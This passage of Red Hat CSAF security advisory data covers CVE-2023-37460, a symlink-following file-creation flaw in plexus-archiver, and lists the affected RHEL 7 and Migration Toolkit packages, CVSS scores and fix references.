"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-11-13T09:42:49+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
RHSA-2023_6886
Vulnerability from csaf_redhat - Published: 2023-11-13 09:42 - Updated: 2024-12-17 23:06Summary
Red Hat Security Advisory: plexus-archiver security update
Notes
Topic
An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.\n\nSecurity Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6886",
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6886.json"
}
],
"title": "Red Hat Security Advisory: plexus-archiver security update",
"tracking": {
"current_release_date": "2024-12-17T23:06:24+00:00",
"generator": {
"date": "2024-12-17T23:06:24+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2023:6886",
"initial_release_date": "2023-11-13T09:42:49+00:00",
"revision_history": [
{
"date": "2023-11-13T09:42:49+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-11-13T09:42:49+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-17T23:06:24+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::client"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::computenode"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::server"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::workstation"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver-javadoc@2.4.2-6.el7_9?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-11-13T09:42:49+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
RHSA-2023_6138
Vulnerability from csaf_redhat - Published: 2023-10-26 10:05 - Updated: 2024-12-17 23:05Summary
Red Hat Security Advisory: Migration Toolkit for Runtimes security update
Notes
Topic
An update is now available for Migration Toolkit for Runtimes.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Migration Toolkit for Runtimes.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Security Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6138",
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "WINDUPRULE-1038",
"url": "https://issues.redhat.com/browse/WINDUPRULE-1038"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6138.json"
}
],
"title": "Red Hat Security Advisory: Migration Toolkit for Runtimes security update",
"tracking": {
"current_release_date": "2024-12-17T23:05:47+00:00",
"generator": {
"date": "2024-12-17T23:05:47+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2023:6138",
"initial_release_date": "2023-10-26T10:05:45+00:00",
"revision_history": [
{
"date": "2023-10-26T10:05:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-10-26T10:05:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-17T23:05:47+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product": {
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_id": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:migration_toolkit_runtimes:1.0::el8"
}
}
}
],
"category": "product_family",
"name": "Migration Toolkit for Runtimes"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
